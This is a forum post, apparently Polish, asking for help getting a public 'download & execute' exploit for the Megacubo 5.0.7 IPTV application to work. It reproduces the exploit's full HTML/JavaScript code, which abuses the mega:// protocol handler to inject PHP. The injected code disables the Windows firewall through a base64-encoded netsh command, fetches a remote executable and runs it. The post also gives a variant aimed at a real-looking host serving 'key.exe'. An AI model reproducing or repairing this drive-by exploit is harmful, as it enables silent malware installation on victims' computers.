Megacubo 5.0.7 - help

[gelman8]

mam exploit:

Megacubo 5.0.7 download & Execute
by :JJunior
site: [url]http://www.musicastop.com.br/[/url]

tested against Internet Explorer 7 and Mozilla Firefox 1.5 Windows Xp sp 3

software site: [url]http://www.megacubo.net/tv/[/url]
download url: [url]http://sourceforge.net/project/showfiles.p...lease_id=608023[/url]

description:
"Megacubo is a IPTV tuner application written in PHP + Winbinder.
It has a catalogue of links of TV streams which are available
for free in the web. At the moment it only runs on Windows(2000,
XP and Vista)."

example exploit, download & Execute :


<html>
<head>
<title>MegaCubo - download & Execute</title>
<meta http-equiv="Content-Type" content="text/html; ">
</head>
<body>
<script>
// url download & exec code evil
evil = '[url]http://www.example.com/evil.exe';[/url]

// disable firewall encode base_64
firewall = 'bmV0c2ggZmlyZXdhbGwgc2V0IG9wbW9kZSBtb2RlID0gZGlzYWJsZQ==';

shellcode = 'mega://play|con.."a()".system(base64_decode("'+firewall+'")).fputs(fopen("c:/Megacubo.exe","w"),file_get_contents("'+evil+'")).system("C:/Megacubo.exe")."/?");print(';

// shell code
window.location=shellcode;

</script>
</body>
</html>

po wrzuceniu go na serwer nie dziala pod ie i mozille (zapory off). w mozilli wyskakuje okienko ze nie dziala cos tam z protokolem mega a w ie ze nie mozna wyswietlic strony i w pasku gdzie sie wpisuje url wyskakuje

mega://play|con.."a()".system(base64_decode("bmV0c2ggZmlyZXdhbGwgc2V0IG9wbW9kZSBtb2RlID0gZGlzYWJsZQ==")).fputs(fopen("c:/Megacubo.exe","w"),file_get_contents("www.stronazkeyem.pl/key.exe")).system("C:/Megacubo.exe")."/?");print(

co z tym zrobic?